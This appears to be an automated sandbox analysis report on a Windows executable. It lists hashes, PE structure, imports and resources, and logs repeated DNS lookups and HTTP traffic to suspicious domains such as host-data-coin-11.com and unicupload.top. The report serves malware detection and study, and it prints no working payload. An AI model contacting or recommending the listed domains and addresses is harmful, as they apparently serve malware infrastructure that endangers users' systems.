                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Entropy (8bit):6.6910111765717115
                                                                                                                      TrID:
                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                      • Windows Screen Saver (13104/52) 0.13%
                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                      File name:OG9rNsihJ7.exe
                                                                                                                      File size:321024
                                                                                                                      MD5:5c7b46771055043f59e0451a342b7ed1
                                                                                                                      SHA1:5362af084622dc8efc661c703d4c7c5dd6839be1
                                                                                                                      SHA256:0245c82558329cfd8ef5ef901e4929075d4d873ba20d9704731758580caed7be
                                                                                                                      SHA512:f16fdd7212bc64f05ef67b41e29dd8966645b7fa0e7d78e8883503503a3589a090c54846500925f17b8dd1d133e1f5bb37bbde16f3e5c50864847c17f7df2c06
                                                                                                                      SSDEEP:6144:1dNi2kGfRHG5p1JX9BnaPGMq3yvNITJwD3EsG1ALc:XNsGfIfnpBCvuJw4sG+
                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.9.)~W.)~W.)~W.7,..3~W.7,...~W...,..~W.)~V..~W.7,...~W.7,..(~W.7,..(~W.Rich)~W.........PE..L.....h_...........................

                                                                                                                      File Icon

                                                                                                                      Icon Hash:c8d0d8e0f0e0e4e0

                                                                                                                      Static PE Info

                                                                                                                      General

                                                                                                                      Entrypoint:0x41b5e0
                                                                                                                      Entrypoint Section:.text
                                                                                                                      Digitally signed:false
                                                                                                                      Imagebase:0x400000
                                                                                                                      Subsystem:windows gui
                                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE, NX_COMPAT
                                                                                                                      Time Stamp:0x5F68D411 [Mon Sep 21 16:25:53 2020 UTC]
                                                                                                                      TLS Callbacks:
                                                                                                                      CLR (.Net) Version:
                                                                                                                      OS Version Major:5
                                                                                                                      OS Version Minor:0
                                                                                                                      File Version Major:5
                                                                                                                      File Version Minor:0
                                                                                                                      Subsystem Version Major:5
                                                                                                                      Subsystem Version Minor:0
                                                                                                                      Import Hash:6801e04a0c2ca60ac2497c0d8723846b

                                                                                                                      Entrypoint Preview

                                                                                                                      Instruction
                                                                                                                      mov edi, edi
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      call 00007F7D5CDB513Bh
                                                                                                                      call 00007F7D5CDA80B6h
                                                                                                                      pop ebp
                                                                                                                      ret
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      int3
                                                                                                                      mov edi, edi
                                                                                                                      push ebp
                                                                                                                      mov ebp, esp
                                                                                                                      push FFFFFFFEh
                                                                                                                      push 0043DBD8h
                                                                                                                      push 0041E7C0h
                                                                                                                      mov eax, dword ptr fs:[00000000h]
                                                                                                                      push eax
                                                                                                                      add esp, FFFFFF94h
                                                                                                                      push ebx
                                                                                                                      push esi
                                                                                                                      push edi
                                                                                                                      mov eax, dword ptr [00440354h]
                                                                                                                      xor dword ptr [ebp-08h], eax
                                                                                                                      xor eax, ebp
                                                                                                                      push eax
                                                                                                                      lea eax, dword ptr [ebp-10h]
                                                                                                                      mov dword ptr fs:[00000000h], eax
                                                                                                                      mov dword ptr [ebp-18h], esp
                                                                                                                      mov dword ptr [ebp-70h], 00000000h
                                                                                                                      mov dword ptr [ebp-04h], 00000000h
                                                                                                                      lea eax, dword ptr [ebp-60h]
                                                                                                                      push eax
                                                                                                                      call dword ptr [0040109Ch]
                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                      jmp 00007F7D5CDA80C8h
                                                                                                                      mov eax, 00000001h
                                                                                                                      ret
                                                                                                                      mov esp, dword ptr [ebp-18h]
                                                                                                                      mov dword ptr [ebp-78h], 000000FFh
                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                      mov eax, dword ptr [ebp-78h]
                                                                                                                      jmp 00007F7D5CDA81F7h
                                                                                                                      mov dword ptr [ebp-04h], FFFFFFFEh
                                                                                                                      call 00007F7D5CDA8234h
                                                                                                                      mov dword ptr [ebp-6Ch], eax
                                                                                                                      push 00000001h
                                                                                                                      call 00007F7D5CDB5B1Ah
                                                                                                                      add esp, 04h
                                                                                                                      test eax, eax
                                                                                                                      jne 00007F7D5CDA80ACh
                                                                                                                      push 0000001Ch
                                                                                                                      call 00007F7D5CDA81ECh
                                                                                                                      add esp, 04h
                                                                                                                      call 00007F7D5CDB1194h
                                                                                                                      test eax, eax
                                                                                                                      jne 00007F7D5CDA80ACh
                                                                                                                      push 00000010h

                                                                                                                      Rich Headers

                                                                                                                      Programming Language:
                                                                                                                      • [ C ] VS2008 build 21022
                                                                                                                      • [IMP] VS2005 build 50727
                                                                                                                      • [ASM] VS2008 build 21022
                                                                                                                      • [LNK] VS2008 build 21022
                                                                                                                      • [RES] VS2008 build 21022
                                                                                                                      • [C++] VS2008 build 21022

                                                                                                                      Data Directories

                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3e3040x50.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1500000x8728.rsrc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1590000x1df4.reloc
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x13a00x1c.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x91000x40.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x10000x34c.text
                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                      Sections

                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                      .text0x10000x3e6be0x3e800False0.58234375data6.96452184589IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                      .data0x400000x10c9880x1800False0.340494791667data3.46807929414IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                      .zafif0x14d0000x50x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                      .naladin0x14e0000xea0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                      .ger0x14f0000xd930xe00False0.00697544642857data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                      .rsrc0x1500000x87280x8800False0.594841452206data5.84519780089IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                      .reloc0x1590000x465a0x4800False0.346137152778data3.69349629733IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                      Resources

                                                                                                                      NameRVASizeTypeLanguageCountry
                                                                                                                      AFX_DIALOG_LAYOUT0x1570480x2dataDutchNetherlands
                                                                                                                      AFX_DIALOG_LAYOUT0x1570400x2dataDutchNetherlands
                                                                                                                      AFX_DIALOG_LAYOUT0x1570500x2dataDutchNetherlands
                                                                                                                      AFX_DIALOG_LAYOUT0x1570580x2dataDutchNetherlands
                                                                                                                      CIDAFICUDUROSOTAROM0x1566280x6c7ASCII text, with very long lines, with no line terminatorsAssameseIndia
                                                                                                                      VIDIWAYAPENIGU0x156cf00x2faASCII text, with very long lines, with no line terminatorsAssameseIndia
                                                                                                                      RT_CURSOR0x1570600x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"DutchNetherlands
                                                                                                                      RT_ICON0x1507400x6c8dataAssameseIndia
                                                                                                                      RT_ICON0x150e080x568GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                                      RT_ICON0x1513700x10a8dataAssameseIndia
                                                                                                                      RT_ICON0x1524180x988dBase III DBT, version number 0, next free block index 40AssameseIndia
                                                                                                                      RT_ICON0x152da00x468GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                                      RT_ICON0x1532580x8a8dataAssameseIndia
                                                                                                                      RT_ICON0x153b000x6c8dataAssameseIndia
                                                                                                                      RT_ICON0x1541c80x568GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                                      RT_ICON0x1547300x10a8dataAssameseIndia
                                                                                                                      RT_ICON0x1557d80x988dataAssameseIndia
                                                                                                                      RT_ICON0x1561600x468GLS_BINARY_LSB_FIRSTAssameseIndia
                                                                                                                      RT_STRING0x1579200xe4dataDutchNetherlands
                                                                                                                      RT_STRING0x157a080x3bcdataDutchNetherlands
                                                                                                                      RT_STRING0x157dc80x6e6dataDutchNetherlands
                                                                                                                      RT_STRING0x1584b00x1a0dataDutchNetherlands
                                                                                                                      RT_STRING0x1586500xd8dataDutchNetherlands
                                                                                                                      RT_ACCELERATOR0x1570000x10dataDutchNetherlands
                                                                                                                      RT_ACCELERATOR0x156ff00x10dataDutchNetherlands
                                                                                                                      RT_GROUP_CURSOR0x1579080x14dataDutchNetherlands
                                                                                                                      RT_GROUP_ICON0x1532080x4cdataAssameseIndia
                                                                                                                      RT_GROUP_ICON0x1565c80x5adataAssameseIndia
                                                                                                                      None0x1570200xadataDutchNetherlands
                                                                                                                      None0x1570300xadataDutchNetherlands
                                                                                                                      None0x1570100xadataDutchNetherlands

                                                                                                                      Imports

                                                                                                                      DLLImport
                                                                                                                      KERNEL32.dllDeactivateActCtx, GetVersionExW, SetConsoleCP, GetConsoleAliasesLengthA, GetDefaultCommConfigA, FindFirstFileExW, GetDriveTypeA, FreeEnvironmentStringsA, SetProcessPriorityBoost, SetVolumeMountPointW, GetLongPathNameW, CopyFileA, TlsGetValue, GetConsoleCursorInfo, SetComputerNameExA, SystemTimeToTzSpecificLocalTime, FindAtomA, ReleaseSemaphore, CallNamedPipeA, CreateMailslotA, BuildCommDCBAndTimeoutsW, VirtualProtect, LoadLibraryA, LocalAlloc, TryEnterCriticalSection, GetCommandLineW, InterlockedDecrement, GetCalendarInfoA, DeleteFileA, CreateActCtxW, CreateRemoteThread, SetSystemTimeAdjustment, SetPriorityClass, WritePrivateProfileStringW, GetProcessHeap, GlobalUnWire, ReadConsoleOutputCharacterW, GetStartupInfoW, GetDiskFreeSpaceExA, GetCPInfoExA, GetWindowsDirectoryW, GetSystemWow64DirectoryW, GetLastError, GetProfileStringW, WriteProfileSectionW, GetProfileStringA, SetLastError, DeleteVolumeMountPointA, DebugBreak, lstrcmpA, ReadFileScatter, SetConsoleMode, GetVersion, GetSystemWindowsDirectoryW, GlobalFindAtomA, FindCloseChangeNotification, GetTapeParameters, SetMailslotInfo, InterlockedExchange, DefineDosDeviceW, FindVolumeMountPointClose, EndUpdateResourceA, WriteConsoleA, GetSystemTimeAdjustment, WritePrivateProfileSectionA, GetPrivateProfileStructW, GetFileAttributesExA, MoveFileW, GetVolumePathNameA, HeapUnlock, lstrcmpW, SetDefaultCommConfigW, GetExitCodeProcess, ResetEvent, GetThreadContext, MoveFileExW, GetProcAddress, GlobalLock, UnregisterWaitEx, BuildCommDCBW, PeekConsoleInputW, GetBinaryTypeW, CreateSemaphoreW, TransmitCommChar, WaitNamedPipeA, GetOverlappedResult, GetPrivateProfileSectionNamesW, FindResourceExW, EnumTimeFormatsW, GetLocalTime, CreateSemaphoreA, FreeEnvironmentStringsW, GetPrivateProfileSectionW, SetFileShortNameA, lstrcpyA, VerLanguageNameW, SetThreadExecutionState, SetSystemTime, LockFile, VerSetConditionMask, GetConsoleAliasA, FlushConsoleInputBuffer, FreeConsole, GetAtomNameW, GetConsoleAliasExesLengthA, WriteConsoleInputW, TransactNamedPipe, EnumDateFormatsA, SetCommState, FileTimeToLocalFileTime, _lopen, GetConsoleAliasExesLengthW, GetWriteWatch, GetModuleHandleW, WriteConsoleOutputCharacterA, GetConsoleMode, HeapFree, OpenMutexA, LocalLock, GetCommMask, SetEndOfFile, FindClose, CreateIoCompletionPort, SetFileApisToANSI, CancelWaitableTimer, GetProcessHandleCount, UnregisterWait, GetConsoleAliasesLengthW, GetCurrentProcessId, lstrcpynA, SetNamedPipeHandleState, GetCompressedFileSizeA, FindNextVolumeMountPointW, GetFullPathNameA, WriteProfileStringA, DeleteAtom, GlobalAddAtomW, AssignProcessToJobObject, QueryDosDeviceW, InitializeCriticalSection, Process32NextW, SetCurrentDirectoryA, GetBinaryTypeA, FindActCtxSectionGuid, TerminateProcess, MoveFileA, RaiseException, HeapValidate, IsBadReadPtr, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, GetModuleHandleA, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, InterlockedIncrement, GetACP, GetOEMCP, GetCPInfo, IsValidCodePage, TlsAlloc, TlsSetValue, GetCurrentThreadId, TlsFree, Sleep, ExitProcess, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, GetEnvironmentStringsW, HeapDestroy, HeapCreate, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, VirtualAlloc, RtlUnwind, InitializeCriticalSectionAndSpinCount, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, LoadLibraryW, MultiByteToWideChar, GetStringTypeA, GetStringTypeW, WideCharToMultiByte, LCMapStringA, LCMapStringW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, FlushFileBuffers, SetStdHandle, GetConsoleOutputCP, CloseHandle, CreateFileA
                                                                                                                      USER32.dllOemToCharA
                                                                                                                      ADVAPI32.dllGetFileSecurityA

                                                                                                                      Possible Origin

                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                      DutchNetherlands
                                                                                                                      AssameseIndia

                                                                                                                      Network Behavior

                                                                                                                      Network Port Distribution

                                                                                                                      TCP Packets

                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                      Jan 14, 2022 21:04:56.168064117 CET4976780192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.185524940 CET80497678.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:56.185648918 CET4976780192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.185808897 CET4976780192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.185820103 CET4976780192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.203051090 CET80497678.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:56.304933071 CET80497678.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:56.305088997 CET4976780192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.307782888 CET4976780192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.325697899 CET80497678.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:56.341706038 CET4976880192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.358999014 CET80497688.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:56.359935045 CET4976880192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.360157013 CET4976880192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.360200882 CET4976880192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.377290964 CET80497688.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:56.482292891 CET80497688.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:56.482412100 CET4976880192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.482448101 CET4976880192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.499706984 CET80497688.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:56.780066967 CET4977080192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.797534943 CET80497708.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:56.797693968 CET4977080192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.797792912 CET4977080192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.798124075 CET4977080192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.815129995 CET80497708.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:56.815234900 CET80497708.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:56.918802023 CET80497708.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:56.918966055 CET4977080192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.919198990 CET4977080192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:56.936613083 CET80497708.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.215174913 CET4977180192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.232685089 CET80497718.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.232800961 CET4977180192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.233021975 CET4977180192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.233035088 CET4977180192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.251200914 CET80497718.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.251225948 CET80497718.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.353318930 CET80497718.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.353806019 CET4977180192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.356858969 CET4977180192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.375365973 CET80497718.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.387559891 CET4977280192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.404964924 CET80497728.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.405318975 CET4977280192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.405474901 CET4977280192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.405489922 CET4977280192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.423932076 CET80497728.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.526876926 CET80497728.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.526974916 CET4977280192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.527295113 CET4977280192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.544733047 CET80497728.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.825119972 CET4977380192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.843961000 CET80497738.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.844115973 CET4977380192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.844273090 CET4977380192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.844293118 CET4977380192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.862025023 CET80497738.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.968394041 CET80497738.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.968425035 CET80497738.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.968502998 CET4977380192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.968885899 CET4977380192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:57.986392975 CET80497738.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:57.987154007 CET4977480192.168.2.5185.186.142.166
                                                                                                                      Jan 14, 2022 21:04:58.044086933 CET8049774185.186.142.166192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:58.551805019 CET4977480192.168.2.5185.186.142.166
                                                                                                                      Jan 14, 2022 21:04:58.608361959 CET8049774185.186.142.166192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:59.114370108 CET4977480192.168.2.5185.186.142.166
                                                                                                                      Jan 14, 2022 21:04:59.170936108 CET8049774185.186.142.166192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:59.209383011 CET4977580192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.228490114 CET80497758.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:59.228616953 CET4977580192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.228887081 CET4977580192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.228907108 CET4977580192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.248428106 CET80497758.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:59.348500013 CET80497758.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:59.352474928 CET4977580192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.352895021 CET4977580192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.370313883 CET80497758.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:59.686207056 CET4977680192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.703638077 CET80497768.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:59.703731060 CET4977680192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.703854084 CET4977680192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.703890085 CET4977680192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.721941948 CET80497768.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:59.844403982 CET80497768.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:04:59.847476006 CET4977680192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.847769022 CET4977680192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:04:59.865098953 CET80497768.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.177220106 CET4977980192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:05:00.194587946 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.194685936 CET4977980192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:05:00.194861889 CET4977980192.168.2.58.209.70.0
                                                                                                                      Jan 14, 2022 21:05:00.253149986 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.295578957 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.295605898 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.295623064 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.295634985 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.295651913 CET80497798.209.70.0192.168.2.5
                                                                                                                      Jan 14, 2022 21:05:00.295667887 CET80497798.209.70.0192.168.2.5

                                                                                                                      DNS Queries

                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                      Jan 14, 2022 21:04:55.877932072 CET192.168.2.58.8.8.80x7494Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:56.323577881 CET192.168.2.58.8.8.80x4933Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:56.493093014 CET192.168.2.58.8.8.80xe41dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:56.927520037 CET192.168.2.58.8.8.80xf2bdStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:57.367894888 CET192.168.2.58.8.8.80x4af2Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:57.536972046 CET192.168.2.58.8.8.80x1f4cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:59.186599016 CET192.168.2.58.8.8.80xd444Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:59.364273071 CET192.168.2.58.8.8.80x992bStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:04:59.856811047 CET192.168.2.58.8.8.80x1977Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:02.046914101 CET192.168.2.58.8.8.80x7b24Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:02.222532988 CET192.168.2.58.8.8.80xf3bfStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:02.713391066 CET192.168.2.58.8.8.80x3fdaStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:03.289355993 CET192.168.2.58.8.8.80xb555Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:03.469676971 CET192.168.2.58.8.8.80xea8fStandard query (0)privacy-tools-for-you-780.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:05.988169909 CET192.168.2.58.8.8.80x14b4Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:06.242278099 CET192.168.2.58.8.8.80xadd5Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:07.186929941 CET192.168.2.58.8.8.80x7f70Standard query (0)unicupload.topA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:07.427100897 CET192.168.2.58.8.8.80x3d00Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:07.655709982 CET192.168.2.58.8.8.80x147dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:07.846596956 CET192.168.2.58.8.8.80x31d8Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:08.083580971 CET192.168.2.58.8.8.80xb57cStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:08.250816107 CET192.168.2.58.8.8.80x9388Standard query (0)data-host-coin-8.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:10.244743109 CET192.168.2.58.8.8.80xf22fStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:10.415355921 CET192.168.2.58.8.8.80x2e3aStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:10.582473040 CET192.168.2.58.8.8.80x11d1Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:10.776063919 CET192.168.2.58.8.8.80xe372Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:13.304208040 CET192.168.2.58.8.8.80x55Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:13.750782013 CET192.168.2.58.8.8.80xf6a9Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:13.945065975 CET192.168.2.58.8.8.80x3e41Standard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:14.142004967 CET192.168.2.58.8.8.80x7e8aStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                                                                                                      Jan 14, 2022 21:05:16.810718060 CET192.168.2.58.8.8.80x780dStandard query (0)host-data-coin-11.comA (IP address)IN (0x0001)
